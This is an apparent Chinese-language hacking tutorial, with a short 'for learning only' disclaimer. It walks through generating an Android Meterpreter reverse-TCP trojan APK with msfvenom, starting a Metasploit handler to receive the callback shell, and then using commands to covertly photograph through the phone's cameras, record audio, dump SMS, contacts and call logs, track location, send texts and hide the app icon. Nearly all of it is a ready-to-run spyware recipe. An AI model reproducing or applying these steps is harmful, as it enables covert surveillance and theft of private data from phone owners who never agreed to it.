此文章仅供个人学习,请勿用于其他非法用途。
实验环境
系统: Kali Liunx
工具: MFS
目标 :安卓手机
- 首先打开msf,输入命令
show payloads
查看攻击载荷
- 配置木马并生成
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.74.129 LPORT=4444 R > /root/桌面/shell.apk
命令说明:
android/meterpreter/reverse_tcp
攻击载荷
LHOST=192.168.74.129
控制端的IP(也就是本机kali的ip) 查询IP的指令 ifconfig
LPORT=4444
监听端口
R > /root/桌面/shell.apk
保存路径为桌面
附图!
- 启用攻击模块,并配置控制端信息。
use exploit/multi/handler
选择攻击模式
set payload android/meterpreter/reverse_tcp
加载攻击模块
show options
查看参数设置
set LHOST
设置攻击机ip
set LPORT
设置监听端口
exploit
执行
最后等待马子上线,反弹shell到控制端。
附图!!
控制终端输入 sysinfo
查看手机系统相关信息
控制终端输入 webcam_list
查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头
webcam_snap
隐秘拍照功能
webcam_stream
开启摄像头
常用命令
webcam_list 列出网络摄像头
record_mic [ˈrekərd]/记录/ 从默认麦克风录制音频为X秒
webcam_chat 开始视频聊天
webcam_snap 从指定的摄像头获取快照
webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头
activity_start 从URI字符串启动Android活动
check_root 检查设备是否有根
dump_calllog 获取调用日志
dump_contacts 获取联系人列表
dump_sms 获取短信
geolocate 利用地理定位获取当前LAT
wlan_geolocate 利用WLAN信息获取当前LAT
hide_app_icon 从发射器隐藏应用程序图标
interval_collect 管理区间收集能力
send_sms 从目标会话发送短消息
set_audio_mode
sqlite_query 从存储库查询SQLite数据库
wakelock 启用/禁用Wakelock